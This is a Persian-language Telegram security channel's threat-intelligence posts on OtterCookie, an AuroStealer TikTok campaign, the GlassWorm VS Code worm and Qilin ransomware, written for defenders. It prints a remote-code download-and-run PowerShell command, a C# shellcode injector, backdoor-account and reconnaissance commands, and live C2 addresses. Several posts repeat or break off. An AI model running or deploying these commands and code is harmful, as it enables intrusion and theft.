Mr. SAM
- ماژول سرقت محتوای کلیپبورد: به طور دورهای محتوای کلیپبورد را بررسی کرده و به سرور C2 ارسال میکند.
- ماژول جدید Keylogging و Screenshotting (ویژگی کلیدی نسخه v5):
- این ماژول که قبلاً مستند نشده بود، کاملاً به زبان جاوا اسکریپت نوشته شده است.
- از پکیجهای
- کلیدهای ثبتشده در فایلی به نام
- این دادهها به صورت دورهای (هر ثانیه برای کیلاگ و هر چهار ثانیه برای اسکرینشات) به یک URL مشخص در سرور C2 ارسال میشوند.
حرکت استراتژیک به سمت جاوا اسکریپت
یک نکته بسیار مهم در این تکامل، انتقال قابلیتهای کلیدی از ماژولهای پایتونی (مانند InvisibleFerret) به ماژولهای مبتنی بر جاوا اسکریپت در OtterCookie است. این تغییر استراتژیک چندین مزیت برای مهاجمان دارد:
1. کاهش وابستگی: نیاز به نصب مفسر پایتون بر روی سیستم قربانی (به خصوص در ویندوز) را از بین میبرد و فرآیند آلودگی را سادهتر و قابل اعتمادتر میکند.
2. پنهانکاری بیشتر: با اجرای تمام عملیات در محیط Node.js، بدافزار میتواند فعالیتهای خود را بهتر با فرآیندهای عادی توسعه نرمافزار ترکیب کرده و از دید ابزارهای امنیتی پنهان بماند.
سخن پایانی
گروه Famous Chollima به طور مداوم در حال بهبود تاکتیکها، تکنیکها و رویههای (TTPs) خود است. ادغام BeaverTail و OtterCookie و افزودن قابلیتهای جدید نشاندهنده سرمایهگذاری این گروه برای ساخت ابزارهای مخرب کارآمدتر و پنهانکارتر است. جامعه توسعهدهندگان به دلیل ماهیت کار خود که شامل استفاده گسترده از پکیجمنیجرها و کدهای شخص ثالث است، یک هدف اصلی برای این نوع حملات زنجیره تأمین (Supply Chain Attack) محسوب میشود.
@NullError_ir
- ماژول جدید Keylogging و Screenshotting (ویژگی کلیدی نسخه v5):
- این ماژول که قبلاً مستند نشده بود، کاملاً به زبان جاوا اسکریپت نوشته شده است.
- از پکیجهای
node-global-key-listener برای ثبت تمام کلیدهای فشردهشده کیبورد و screenshot-desktop برای گرفتن عکس از صفحه دسکتاپ استفاده میکند.- کلیدهای ثبتشده در فایلی به نام
1.tmp و اسکرینشاتها در فایلی به نام 2.jpeg در یک پوشه موقت (windows-cache) ذخیره میشوند.- این دادهها به صورت دورهای (هر ثانیه برای کیلاگ و هر چهار ثانیه برای اسکرینشات) به یک URL مشخص در سرور C2 ارسال میشوند.
حرکت استراتژیک به سمت جاوا اسکریپت
یک نکته بسیار مهم در این تکامل، انتقال قابلیتهای کلیدی از ماژولهای پایتونی (مانند InvisibleFerret) به ماژولهای مبتنی بر جاوا اسکریپت در OtterCookie است. این تغییر استراتژیک چندین مزیت برای مهاجمان دارد:
1. کاهش وابستگی: نیاز به نصب مفسر پایتون بر روی سیستم قربانی (به خصوص در ویندوز) را از بین میبرد و فرآیند آلودگی را سادهتر و قابل اعتمادتر میکند.
2. پنهانکاری بیشتر: با اجرای تمام عملیات در محیط Node.js، بدافزار میتواند فعالیتهای خود را بهتر با فرآیندهای عادی توسعه نرمافزار ترکیب کرده و از دید ابزارهای امنیتی پنهان بماند.
سخن پایانی
گروه Famous Chollima به طور مداوم در حال بهبود تاکتیکها، تکنیکها و رویههای (TTPs) خود است. ادغام BeaverTail و OtterCookie و افزودن قابلیتهای جدید نشاندهنده سرمایهگذاری این گروه برای ساخت ابزارهای مخرب کارآمدتر و پنهانکارتر است. جامعه توسعهدهندگان به دلیل ماهیت کار خود که شامل استفاده گسترده از پکیجمنیجرها و کدهای شخص ثالث است، یک هدف اصلی برای این نوع حملات زنجیره تأمین (Supply Chain Attack) محسوب میشود.
@NullError_ir
هکرها با استفاده از ویدیوهای TikTok، بدافزار خود را نصب میکنند
این گزارش به تحلیل یک کمپین فعال مهندسی اجتماعی در پلتفرم TikTok میپردازد که کاربران را با وعده فعالسازی رایگان نرمافزارهای گرانقیمت مانند Photoshop، فریب داده و به نصب بدافزار سارق اطلاعات (InfoStealer) به نام AuroStealer آلوده میکند. این تحلیل، زنجیره آلودگی (Kill Chain) و تکنیکهای پیشرفته مورد استفاده مهاجمان را تشریح میکند.
مهاجمان از پلتفرم محبوب TikTok برای انتشار ویدئوهای فریبنده استفاده میکنند.
* طعمه : ارائه راهی آسان برای فعالسازی رایگان Adobe Photoshop.
* تکنیک: این حمله از یک تکنیک مهندسی اجتماعی مشابه ClickFix بهره میبرد. در این روش، به جای ارسال یک فایل اجرایی، قربانی ترغیب میشود تا با دسترسی Administrator ، یک خط فرمان PowerShell را مستقیماً اجرا کند. این کار باعث میشود کاربر، خود، مکانیزمهای امنیتی اولیه را دور بزند.
* فرمان مخرب:
iex (irm slmgr[.]win/photoshop)
۔* irm (Invoke-RestMethod): این cmdlet محتوا را از URL مشخص شده (
slmgr[.]win/photoshop) دانلود میکند.۔* iex (Invoke-Expression): این cmdlet خطرناک، محتوای دانلود شده (که یک اسکریپت پاورشل است) را مستقیماً در حافظه اجرا میکند. این یک تکنیک "fileless" (بدون فایل) است که از شناسایی مبتنی بر فایل توسط آنتیویروسها جلوگیری میکند.
## تحلیل زنجیره آلودگی (Kill Chain Analysis)
مرحله اول: اسکریپت پاورشل (Stager)
اسکریپت پاورشل دانلود شده از
slmgr[.]win (با هش SHA256: 6D897B56...) به عنوان مرحله اول (Stager) عمل میکند و دو وظیفه اصلی دارد:1. دانلود payload: دانلود مرحله بعدی بدافزار (
updater.exe) از آدرس https://file-epq[.]pages[.]dev/updater.exe2. ایجاد ماندگاری (Persistence):
* این اسکریپت یک Scheduled Task (وظیفه زمانبندی شده) ایجاد میکند تا بدافزار در هر بار لاگین کاربر اجرا شود (
-Trigger (New-ScheduledTaskTrigger -AtLogOn)).* تکنیک فرار از شناسایی (Evasion): برای جلوگیری از شناسایی و ترکیب شدن با وظایف سیستمی، اسکریپت به صورت تصادفی یکی از نامهای موجه زیر را برای وظیفه خود انتخاب میکند:
*
MicrosoftEdgeUpdateTaskMachineCore*
GoogleUpdateTaskMachineCore*
AdobeUpdateTask*
OfficeBackgroundTaskHandlerRegistration*
WindowsUpdateCheck* این وظیفه با بالاترین سطح دسترسی (
-RunLevel Highest) اجرا میشود، زیرا قربانی در ابتدا پاورشل را با دسترسی ادمین اجرا کرده است.مرحله دوم: پیلود اصلی (AuroStealer)
* فایل
updater.exe (با هش SHA256: 58b11b4d...) که توسط گزارش SANS به عنوان بدافزار AuroStealer (بر اساس Malpedia) شناسایی شده است.۔* AuroStealer یک (InfoStealer) است که احتمالاً مبتنی بر .NET میباشد. این نوع بدافزارها به طور خاص برای سرقت اطلاعات حساس مانند کوکیهای مرورگر، رمزهای عبور ذخیره شده، اطلاعات کارتهای اعتباری و دادههای مربوط به کیف پولهای ارز دیجیتال طراحی شدهاند.
مرحله سوم: پیلود ثانویه و تکنیک "خود-کامپایلی" (Self-Compiling)
* در نهایت، پیلود دومی به نام
source.exe (با هش SHA256: db57e4a7...) دانلود و اجرا میشود.* تکنیک پیشرفته (TTP): این بدافزار از یک تکنیک جالب برای فرار از شناسایی به نام "On-Demand Compilation" یا "Self-Compiling Malware" استفاده میکند.
1. بدافزار
source.exe به جای حمل مستقیم کد مخرب نهایی، حاوی سورس کد C\# است.2. سپس، کامپایلر قانونی و امضا شده مایکروسافت (
csc.exe) را که بخشی از .NET Framework است، فراخوانی میکند:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\vpkwkdbo.cmdline3. این دستور، سورس کد موجود در فایل
vpkwkdbo.cmdline را در لحظه بر روی سیستم قربانی کامپایل میکند.* تحلیل کد C\# کامپایل شده: کد C\# کامپایل شده یک کلاس ساده به نام
SC ایجاد میکند که یک Shellcode Injector کلاسیک است:Please open Telegram to view this post
VIEW IN TELEGRAM
Mr. SAM
public class SC {
[DllImport("kernel32.dll")]
public static extern IntPtr VirtualAlloc(IntPtr a, uint s, uint t, uint p);
[DllImport("kernel32.dll")]
public static extern IntPtr CreateThread(IntPtr a, uint s, IntPtr addr, IntPtr p, uint f, IntPtr t);
[DllImport("kernel32.dll")]
public static extern uint WaitForSingleObject(IntPtr h, uint m);
public static void Run(byte[] sc) {
// 1. تخصیص حافظه با دسترسی RWX (Read-Write-Execute)
IntPtr addr = VirtualAlloc(IntPtr.Zero, (uint)sc.Length, 0x3000, 0x40);
// 2. کپی کردن شلکد در حافظه تخصیص یافته
Marshal.Copy(sc, 0, addr, sc.Length);
// 3. اجرای شلکد در یک نخ (Thread) جدید
IntPtr t = CreateThread(IntPtr.Zero, 0, addr, IntPtr.Zero, 0, IntPtr.Zero);
WaitForSingleObject(t, 0xFFFFFFFF);
}
}* اهمیت تکنیک: این روش بسیار موثر است زیرا:
1. فرار از تحلیل استاتیک: فایل
source.exe فاقد کدهای مخرب نهایی است و صرفاً سورس کد C\# را حمل میکند که شناسایی آن دشوارتر است.2. استفاده از LotL (Living-off-the-Land): از یک ابزار قانونی و مورد اعتماد سیستمعامل (
csc.exe) برای ساخت پیلود نهایی سوءاستفاده میکند.3. اجرای در حافظه: شلکد نهایی (که احتمالاً خود AuroStealer یا یک RAT است) مستقیماً در حافظه اجرا میشود و هیچ فایل اجرایی جدیدی روی دیسک باقی نمیگذارد.
* استفاده از
VirtualAlloc با پرچم 0x40 (PAGE\_EXECUTE\_READWRITE) یک پرچم قرمز بزرگ در تحلیل بدافزار است، زیرا به حافظه اجازه میدهد همزمان قابل نوشتن و قابل اجرا باشد (نقض اصل W^X).@NullError_ir
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - TwoSevenOneT/DefenderWrite: A tool that supports finding and abusing whitelisted programs to allow arbitrary file writing…
A tool that supports finding and abusing whitelisted programs to allow arbitrary file writing into the executable folder of Antivirus software - TwoSevenOneT/DefenderWrite
Please open Telegram to view this post
VIEW IN TELEGRAM
👍2
بدافزار GlassWorm تهاجم با کد نامرئی و C2 مبتنی بر بلاکچین به OpenVSX
تحلیلگران امنیتی از شناسایی یک worm خود-تکثیر (Self-Propagating) جدید به نام GlassWorm خبر دادهاند که به طور خاص افزونههای VS Code در مارکتپلیس OpenVSX را هدف قرار داده است. این حمله، که تنها یک ماه پس از شناسایی worm مشابهی به نام Shai Hulud در اکوسیستم npm رخ میدهد، نشاندهنده یک جهش قابل توجه در تکنیکهای حملات زنجیره تأمین است.
این GlassWorm صرفاً یک حمله زنجیره تأمین دیگر نیست؛ این بدافزار از مجموعهای از تکنیکهای بسیار پیشرفته استفاده میکند که آن را در رده حملات سطح APT قرار میدهد:
1۔ کد نامرئی (Invisible Code): استفاده از کاراکترهای یونیکد (Unicode) غیرقابل چاپ برای پنهانسازی کامل کد مخرب از دید بازبینهای انسانی و ابزارهای تحلیل استاتیک.
2۔ زیرساخت C2 مبتنی بر بلاکچین: استفاده از بلاکچین Solana به عنوان یک سرور C2 تغییرناپذیر و غیرقابل حذف (Immutable).
3۔ C2 پشتیبان: استفاده از Google Calendar به عنوان مکانیزم C2 ثانویه.
4۔ Payload نهایی: یک Remote Access Trojan (RAT) تمامعیار که ماشینهای توسعهدهندگان را به نودهای پراکسی (Proxy Node) در یک زیرساخت مجرمانه تبدیل میکند.
در حال حاضر (بر اساس گزارش اولیه)، این حمله فعال است. هفت افزونه در OpenVSX و یک افزونه در مارکتپلیس رسمی VSCode مایکروسافت آلوده شناسایی شدهاند که مجموعاً بیش از 35,800 بار دانلود شدهاند.
تکنیک پنهانسازی کد با یونیکد
مشخصه GlassWorm تکنیک پنهانسازی آن است. مهاجمان کد مخرب را نه با obfuscation یا minification، بلکه با استفاده از کاراکترهای انتخابگر تنوع یونیکد (Unicode variation selectors) در سورس کد جاوا اسکریپت افزونه تزریق کردهاند.
این کاراکترها، در حالی که بخشی از استاندارد یونیکد هستند، هیچ خروجی بصری در اکثر ویرایشگرهای کد (IDEها) مانند VS Code یا در ابزارهای بازبینی کد مانند
git diff ایجاد نمیکنند. در نتیجه، یک توسعهدهنده یا بازبین امنیتی، هنگام بررسی سورس کد، تنها چندین خط خالی یا فضای سفید مشاهده میکند، در حالی که مفسر جاوا اسکریپت این کاراکترها را به عنوان کد اجرایی معتبر شناسایی و اجرا میکند.این تکنیک به طور کامل فرآیندهای سنتی Code Review انسانی و ابزارهای SAST (Static Analysis Security Testing) را که برای شناسایی چنین کاراکترهایی طراحی نشدهاند، دور میزند.
زیرساخت C2 سهلایه و تخریبناپذیر
پیچیدگی GlassWorm در زیرساخت Command and Control آن به اوج میرسد:
لایه ۱: C2 اولیه مبتنی بر بلاکچین Solana
بدافزار پس از اجرا، یک آدرس کیف پول (Wallet Address) هاردکد شده در بلاکچین Solana را جستجو میکند. سپس، تراکنشهای مرتبط با این کیف پول را برای یافتن فیلد memo بررسی میکند.
مهاجمان URL دانلود payload مرحله بعد را در قالب یک آبجکت JSON (به صورت Base64-encoded) در فیلد memo یک تراکنش ثبت کردهاند.
چرا این تکنیک ویرانگر است؟
* تغییرناپذیری (Immutability): پس از ثبت تراکنش در بلاکچین، امکان حذف یا تغییر آن وجود ندارد. هیچ ارائهدهنده هاستینگ یا ثبتکننده دامنهای برای ارسال درخواست Takedown وجود ندارد.
* ناشناسی (Anonymity): کیف پولهای کریپتو، ناشناسی بالایی را فراهم میکنند.
* مقاومت در برابر سانسور: زیرساخت غیرمتمرکز است و نمیتوان آن را خاموش کرد.
* پویایی: مهاجم میتواند با ارسال یک تراکنش جدید (با هزینهای کمتر از یک سنت)، آدرس IP یا دامنه payload سرور خود را بهروزرسانی کند و تمام قربانیان به طور خودکار به آدرس جدید هدایت میشوند.
لایه ۲: C2 پشتیبان مبتنی بر Google Calendar
به عنوان یک مکانیزم پشتیبان هوشمندانه، بدافزار به یک رویداد Google Calendar عمومی دسترسی پیدا میکند. مهاجم URL دانلود payload (این بار با مسیر
get_zombi_payload/) را به صورت Base64 در عنوان (Title) این رویداد تقویم ذخیره کرده است.از آنجایی که ترافیک به دامنههای گوگل (calendar.app.google) کاملاً قانونی تلقی میشود، این ارتباط از دید اکثر ابزارهای امنیتی شبکه پنهان میماند.
لایه ۳: تحویل Payload
پیلود مرحله بعد (که از آدرس بهدستآمده از Solana یا Google Calendar دانلود میشود) با AES-256-CBC رمزنگاری شده است. نکته هوشمندانه اینجاست که کلید رمزگشایی (Decryption Key) در داخل payload نیست، بلکه در هدرهای سفارشی (Custom HTTP Headers) پاسخ سرور C2 ارسال میشود. این کار تحلیل خودکار ترافیک شبکه را دشوارتر میکند.
تحلیل Payload نهایی: ماژول "ZOMBI"
این Payload نهایی که "ZOMBI" نامگذاری شده است، یک RAT بسیار پیشرفته با قابلیتهای زیر است که ماشین توسعهدهنده را به یک "سرباز زامبی" در باتنت مهاجم تبدیل میکند:
Please open Telegram to view this post
VIEW IN TELEGRAM
Mr. SAM
1. سرقت گسترده اعتبارنامهها (Credential Harvesting):
* توکنهای احراز هویت NPM
* توکنهای GitHub و OpenVSX
* اعتبارنامههای Git
* هدف قرار دادن ۴۹ افزونه مختلف کیف پول رمزارز (از جمله MetaMask, Phantom, Coinbase Wallet و ...) برای تخلیه داراییها.
2. ایجاد SOCKS Proxy:
* خطرناکترین قابلیت این ماژول، تبدیل سیستم قربانی به یک SOCKS Proxy Server است.
* این به مهاجم اجازه میدهد تا ترافیک مجرمانه خود را از طریق ماشین قربانی (که اغلب در داخل یک شبکه سازمانی و پشت فایروالها قرار دارد) مسیریابی کند. این امکان Pivoting به درون شبکه داخلی سازمان، ناشناسسازی حملات و دور زدن کنترلهای امنیتی را فراهم میآورد.
3. کنترل P2P از طریق WebRTC:
* استفاده از ماژولهای WebRTC برای ایجاد کانالهای ارتباطی Peer-to-Peer مستقیم با قربانی. این تکنیک با استفاده از NAT Traversal**، فایروالهای سنتی را دور زده و امکان کنترل مستقیم و آنی را فراهم میکند.
4. **توزیع فرمان از طریق BitTorrent DHT:
* استفاده از Distributed Hash Table (DHT) شبکه BitTorrent برای توزیع دستورات. این یک مکانیزم C2 کاملاً غیرمتمرکز دیگر است که هیچ سرور مرکزی برای شناسایی و مسدودسازی ندارد.
5. دسترسی ریموت پنهان (HVNC):
* بدافزار یک سرور Hidden VNC راهاندازی میکند. برخلاف VNC استاندارد، HVNC در یک دسکتاپ مجازی پنهان اجرا میشود که در Task Manager یا روی صفحه نمایش قربانی قابل مشاهده نیست.
* مهاجم میتواند به طور کامل و نامرئی با دسکتاپ قربانی کار کند، به سشنهای لاگینشده (ایمیل، Slack، ابزارهای داخلی) دسترسی یابد، سورس کدها را بخواند و به سیستمهای دیگر در شبکه داخلی حمله کند.
مکانیزم انتشار (Worm)
بدافزار GlassWorm نام خود را به عنوان یک "کرم" از قابلیت خود-تکثیریاش گرفته است. این بدافزار از اعتبارنامههای سرقترفته (NPM, GitHub, OpenVSX) استفاده میکند تا به صورت خودکار به پکیجها و افزونههای دیگری که توسعهدهنده قربانی به آنها دسترسی دارد، نفوذ کند، کد نامرئی خود را تزریق کرده و نسخههای مخرب جدیدی منتشر کند.
این چرخه به صورت نمایی (Exponential) رشد میکند و هر قربانی جدید، خود به یک نقطه انتشار جدید تبدیل میشود.
### شاخصهای کلیدی نفوذ (IOCs)
افزونههای آلوده (OpenVSX و VSCode):
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
زیرساخت شبکه و بلاکچین:
* IP سرور C2 اولیه:
* IP سرور Exfiltration داده:
* آدرس کیف پول Solana (C2):
* تراکنش نمونه (C2):
* آدرس Google Calendar (C2):
* ایمیل سازماندهنده Calendar:
#### Payload URLs:
*
*
*
شاخصهای Persistence در رجیستری (ویندوز):
*
*
@NullError_ir
* توکنهای احراز هویت NPM
* توکنهای GitHub و OpenVSX
* اعتبارنامههای Git
* هدف قرار دادن ۴۹ افزونه مختلف کیف پول رمزارز (از جمله MetaMask, Phantom, Coinbase Wallet و ...) برای تخلیه داراییها.
2. ایجاد SOCKS Proxy:
* خطرناکترین قابلیت این ماژول، تبدیل سیستم قربانی به یک SOCKS Proxy Server است.
* این به مهاجم اجازه میدهد تا ترافیک مجرمانه خود را از طریق ماشین قربانی (که اغلب در داخل یک شبکه سازمانی و پشت فایروالها قرار دارد) مسیریابی کند. این امکان Pivoting به درون شبکه داخلی سازمان، ناشناسسازی حملات و دور زدن کنترلهای امنیتی را فراهم میآورد.
3. کنترل P2P از طریق WebRTC:
* استفاده از ماژولهای WebRTC برای ایجاد کانالهای ارتباطی Peer-to-Peer مستقیم با قربانی. این تکنیک با استفاده از NAT Traversal**، فایروالهای سنتی را دور زده و امکان کنترل مستقیم و آنی را فراهم میکند.
4. **توزیع فرمان از طریق BitTorrent DHT:
* استفاده از Distributed Hash Table (DHT) شبکه BitTorrent برای توزیع دستورات. این یک مکانیزم C2 کاملاً غیرمتمرکز دیگر است که هیچ سرور مرکزی برای شناسایی و مسدودسازی ندارد.
5. دسترسی ریموت پنهان (HVNC):
* بدافزار یک سرور Hidden VNC راهاندازی میکند. برخلاف VNC استاندارد، HVNC در یک دسکتاپ مجازی پنهان اجرا میشود که در Task Manager یا روی صفحه نمایش قربانی قابل مشاهده نیست.
* مهاجم میتواند به طور کامل و نامرئی با دسکتاپ قربانی کار کند، به سشنهای لاگینشده (ایمیل، Slack، ابزارهای داخلی) دسترسی یابد، سورس کدها را بخواند و به سیستمهای دیگر در شبکه داخلی حمله کند.
مکانیزم انتشار (Worm)
بدافزار GlassWorm نام خود را به عنوان یک "کرم" از قابلیت خود-تکثیریاش گرفته است. این بدافزار از اعتبارنامههای سرقترفته (NPM, GitHub, OpenVSX) استفاده میکند تا به صورت خودکار به پکیجها و افزونههای دیگری که توسعهدهنده قربانی به آنها دسترسی دارد، نفوذ کند، کد نامرئی خود را تزریق کرده و نسخههای مخرب جدیدی منتشر کند.
این چرخه به صورت نمایی (Exponential) رشد میکند و هر قربانی جدید، خود به یک نقطه انتشار جدید تبدیل میشود.
### شاخصهای کلیدی نفوذ (IOCs)
افزونههای آلوده (OpenVSX و VSCode):
*
codejoy.codejoy-vscode-extension@1.8.3*
codejoy.codejoy-vscode-extension@1.8.4*
l-igh-t.vscode-theme-seti-folder@1.2.3*
kleinesfilmroellchen.serenity-dsl-syntaxhighlight@0.3.2*
JScearcy.rust-doc-viewer@4.2.1*
SIRILMP.dark-theme-sm@3.11.4*
CodeInKlingon.git-worktree-menu@1.0.9*
CodeInKlingon.git-worktree-menu@1.0.91*
ginfuru.better-nunjucks@0.3.2*
ellacrity.recoil@0.7.4*
grrrck.positron-plus-1-e@0.0.71*
jeronimoekerdt.color-picker-universal@2.8.91*
srcery-colors.srcery-colors@0.3.9*
sissel.shopify-liquid@4.0.1*
TretinV3.forts-api-extention@0.3.1*
cline-ai-main.cline-ai-agent@3.1.3 (Microsoft VSCode Marketplace)زیرساخت شبکه و بلاکچین:
* IP سرور C2 اولیه:
217.69.3.218* IP سرور Exfiltration داده:
140.82.52.31:80/wall* آدرس کیف پول Solana (C2):
28PKnu7RzizxBzFPoLp69HLXp9bJL3JFtT2s5QzHsEA2* تراکنش نمونه (C2):
49CDiVWZpuSW1b2HpzweMgePNg15dckgmqrrmpihYXJMYRsZvumVtFsDim1keESPCrKcW2CzYjN3nSQDGG14KKFM* آدرس Google Calendar (C2):
https://calendar.app.google/M2ZCvM8ULL56PD1d6* ایمیل سازماندهنده Calendar:
uhjdclolkdn@gmail.com#### Payload URLs:
*
http://217.69.3.218/qQD%2FJoi3WCWSk8ggGHiTdg%3D%3D*
http://217.69.3.218/get_arhive_npm/*
http://217.69.3.218/get_zombi_payload/qQD%2FJoi3WCWSk8ggGHiTdg%3D%3Dشاخصهای Persistence در رجیستری (ویندوز):
*
HKCU\Software\Microsoft\Windows\CurrentVersion\Run*
HKLM\Software\Microsoft\Windows\CurrentVersion\Run@NullError_ir
Mr. SAM
1. سرقت گسترده اعتبارنامهها (Credential Harvesting): * توکنهای احراز هویت NPM * توکنهای GitHub و OpenVSX * اعتبارنامههای Git * هدف قرار دادن ۴۹ افزونه مختلف کیف پول رمزارز (از جمله MetaMask, Phantom, Coinbase Wallet و ...) برای تخلیه داراییها.…
Poc.js
5.8 KB
این هم یک مثال واقعی از کاراکترهای نامرئی که یک محقق به صورت چشمی نمیتونه چیزی ببینه ولی درواقع شامل دستورات هست .
هم در مرورگر و هم در node قابل اجراست .
در مرورگر یک alert به شما نشون میده و در ترمینال node دستور ls اجرا میشه .
@NullError_ir
هم در مرورگر و هم در node قابل اجراست .
در مرورگر یک alert به شما نشون میده و در ترمینال node دستور ls اجرا میشه .
@NullError_ir
اکسپلویت آسیب پذیری در ویندوز سرور
این آسیب پذیری به مهاجمان اجازه میدهد تا کد دلخواه را با امتیازات سطح سیستم از طریق شبکه اجرا کنند و بهطور بالقوه کل زیرساختهای فناوری اطلاعات را به خطر بیندازند .
ویندوز سرور ۲۰۱۲
ویندوز سرور ۲۰۱۲ R2
ویندوز سرور ۲۰۱۶
ویندوز سرور ۲۰۱۹
ویندوز سرور ۲۰۲۲
ویندوز سرور ۲۰۲۲، نسخه ۲۳H2
ویندوز سرور ۲۰۲۵
@NullError_ir
Please open Telegram to view this post
VIEW IN TELEGRAM
Gist
CVE-2025-59287
CVE-2025-59287. GitHub Gist: instantly share code, notes, and snippets.
کشف یک کمپین باجافزاری پیچیده
باجافزار Agenda (Qilin)
این حمله نشاندهنده یک تاکتیک بسیار پیشرفته و نگرانکننده است: استقرار و اجرای مستقیم یک باینری باجافزار مبتنی بر لینوکس بر روی سیستمهای میزبان ویندوزی . این رویکرد اجرای بین-پلتفرمی (Cross-Platform Execution)، بسیاری از راهحلهای امنیتی مرسوم متمرکز بر ویندوز، از جمله پلتفرمهای EDR، را دور میزند.
نکات کلیدی و یافتههای اصلی
* گروه عامل: Agenda (شناختهشده با نام Qilin)، یک عملیات باجافزار به عنوان سرویس (RaaS).
* تکنیک اصلی: اجرای باینری لینوکس بر روی ویندوز با سوءاستفاده از ابزارهای قانونی مدیریت از راه دور (RMM) و انتقال فایل.
۔ ابزارهای قانونی مورد سوءاستفاده:
۔ WinSCP: برای انتقال امن باینری لینوکس به میزبان ویندوزی.
۔ Splashtop Remote: برای اجرای مستقیم باینری لینوکس روی ویندوز.
۔ ATERA Networks (RMM): برای نصب AnyDesk.
۔ ScreenConnect: برای اجرای دستورات شناسایی.
* تاکتیکهای فرار از دفاع: استفاده از حمله BYOVD (Bring Your Own Vulnerable Driver) برای خنثیسازی ابزارهای امنیتی (AV/EDR).
* هدف اصلی: زیرساختهای پشتیبانگیری Veeam برای سرقت سیستماتیک اعتبارنامهها و حذف گزینههای بازیابی.
* قربانیشناسی: از ژانویه ۲۰۲۵، بیش از ۷۰۰ قربانی در ۶۲ کشور، با تمرکز بر بازارهای توسعهیافته (ایالات متحده، فرانسه، کانادا، بریتانیا) و صنایع با ارزش بالا (تولید، فناوری، خدمات مالی، مراقبتهای بهداشتی).
زنجیره حمله (Attack Chain) به صورت دقیق
زنجیره حمله این گروه بسیار پیچیده و چند مرحلهای است و بر پنهانکاری از طریق ابزارهای قانونی (Living-off-the-Land) و تکنیکهای پیشرفته فرار از دفاع متمرکز است.
# ۱. دسترسی اولیه (Initial Access)
* مهاجمان از طریق یک کمپین مهندسی اجتماعی پیچیده با استفاده از صفحات جعلی CAPTCHA که بر روی زیرساخت ذخیرهسازی Cloudflare R2 میزبانی شدهاند، نفوذ اولیه را به دست میآورند.
* این صفحات، کدهای جاوا اسکریپت مبهمسازیشدهای را اجرا میکنند که منجر به دانلود Information Stealer (سارق اطلاعات) بر روی سیستم قربانی میشود.
* این بدافزار، توکنهای احراز هویت، کوکیهای مرورگر و اعتبارنامههای ذخیرهشده را برداشت میکند.
* داشتن این اعتبارنامههای معتبر به مهاجمان اجازه میدهد تا MFA (احراز هویت چندعاملی) را دور بزنند و با استفاده از نشستهای (Sessions) کاربری قانونی، در شبکه حرکت جانبی کنند.
# ۲. ارتقای سطح دسترسی (Privilege Escalation)
* پس از نفوذ، مهاجمان یک SOCKS proxy DLL (مانند
socks64.dll) را مستقر میکنند.* این DLL مستقیماً با استفاده از فرآیند قانونی ویندوز (
rundll32.exe socks64.dll,rundll) در حافظه بارگذاری میشود تا شناسایی آن دشوارتر گردد.* یک حساب کاربری ادمین پشتیبان (Backdoor) با نامی موجه مانند "Supportt" ایجاد میشود (
net user Supportt ... /add و net localgroup Administrators Supportt /add).* همچنین رمز عبور حساب Administrator قانونی سیستم نیز تغییر داده میشود تا کنترل کامل حفظ گردد.
# ۳. شناسایی و نصب RMM (Discovery & RMM Installation)
* مهاجمان به طور گسترده از ابزارهای RMM قانونی برای شناسایی شبکه سوءاستفاده میکنند:
* با استفاده از ScreenConnect ، اسکریپتهای فرمان موقتی را برای شمارش Domain Trusts (
nltest /domain_trusts ) و شناسایی ادمینهای دامنه ( net group "domain admins" /domain ) اجرا میکنند.* از ابزار NetScan برای اسکن جامع شبکه استفاده میکنند.
* آنها از ایجنت ATERA Networks برای نصب AnyDesk (نسخه ۹.۰.۵) بهره میبرند.
* استفاده همزمان از ATERA، AnyDesk و ScreenConnect به آنها قابلیتهای دسترسی از راه دور اضافی و قانونی (از دید سیستمهای مانیتورینگ) میدهد.
# ۴. دسترسی به اعتبارنامهها (Credential Access)
* این مرحله یکی از حیاتیترین بخشهای حمله است. مهاجمان به طور خاص زیرساخت پشتیبانگیری Veeam را هدف قرار میدهند.
* آنها اسکریپتهای PowerShell با پیلودهای Base64-encoded را اجرا میکنند.
* این اسکریپتها مستقیماً دیتابیسهای SQL سرور Veeam را هدف قرار میدهند (مانند
[VeeamBackup].[dbo].[Credentials]) تا اعتبارنامههای ذخیرهشده را استخراج و رمزگشایی کنند.* از این طریق، آنها به مجموعهای جامع از اعتبارنامههای حساس، از جمله ادمینهای دامنه، حسابهای سرویس (svc-sql-*** , DOMAIN\veeam-svc-*** ) و ادمینهای محلی سرورهای حیاتی (کنترلرهای دامنه، سرورهای Exchange ، پایگاههای داده) دست مییابند.
Please open Telegram to view this post
VIEW IN TELEGRAM
Mr. SAM
# ۵. فرار از دفاع (Defense Evasion)
* مهاجمان از تکنیک پیشرفته BYOVD (Bring Your Own Vulnerable Driver) برای غیرفعال کردن راهحلهای امنیتی استفاده میکنند.
* آنها ابزارهایی مانند
* این درایور که دارای امضای دیجیتال یک شرکت چینی توسعهدهنده بازی ("Thumb World (Beijing) Network Technology Co., Ltd.") است، قابلیتهایی برای خاتمه دادن اجباری به فرآیندها (مانند فرآیندهای AV و EDR) از طریق ایجاد Thread در سطح کرنل دارد.
* علاوه بر این، یک کامپوننت دیگر به نام msimg32.dll شناسایی شد که از طریق تکنیک DLL Sideloading (با استفاده از یک فایل اجرایی قانونی مانند
۔
۔
* این دو درایور پیش از این در کمپینهای باجافزار Akira برای دستیابی به دسترسی سطح کرنل و خاتمه دادن به EDR ها مشاهده شده بودند.
# ۶. حرکت جانبی و C&C
* برای حرکت جانبی به سیستمهای لینوکسی در محیط، مهاجمان کلاینتهای PuTTY SSH را با نامهای تغییریافته (مانند
* برای ارتباطات Command and Control، آنها چندین نمونه از بکدور COROXY (که یک SOCKS proxy DLL است) را در دایرکتوریهای نرمافزارهای قانونی مانند
مرحله نهایی: استقرار پیلود کراس-پلتفرم
این بخش، نوآورانهترین بخش حمله است:
1. انتقال فایل: مهاجمان از
2. اجرا: آنها از سرویس مدیریت Splashtop Remote (به طور خاص فایل
این تکنیک بسیار مؤثر است زیرا اکثر راهحلهای EDR و مکانیسمهای کنترلی ویندوز برای نظارت یا جلوگیری از اجرای یک باینری لینوکسی (که توسط یک ابزار مدیریت از راه دور قانونی فراخوانی شده) پیکربندی نشدهاند.
تحلیل واریانت لینوکس باجافزار
